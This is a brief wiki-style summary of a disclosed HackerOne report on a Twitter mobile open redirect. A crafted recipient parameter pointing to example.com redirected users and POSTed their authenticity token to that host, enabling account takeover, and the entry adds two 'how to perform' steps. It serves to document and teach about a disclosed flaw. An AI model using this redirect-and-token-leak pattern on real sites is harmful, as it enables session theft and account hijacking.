Open Redirect leak of authenticity token lead to full account take over

From Hackipedia
Jump to: navigation, search
Hackerone #49759
Target: Twitter
Target Module:
Type: Open Redirect
Payload:
Original: Link
CVE:
Archive Screenshot

When on Twitters mobile site viewing private messages you could choose to follow a user who you were speaking with. Using this URL

mobile.twitter.com/messages/follow?recipient=user_to_follow

seifelsallamy found that a URL could be placed in the recipient parameter as so

mobile.twitter.com/messages/follow?recipient=/example.com

Which would redirect the user to example.com, but would further more POST the users authenticity token to the example.com. This would give opportunity to a malicious user to steal Twitter accounts.

How To Perform

  1. Find open redirect
  2. Use Wireshark or the browser's Network inspector to look for any data that is being passed to a 3rd party.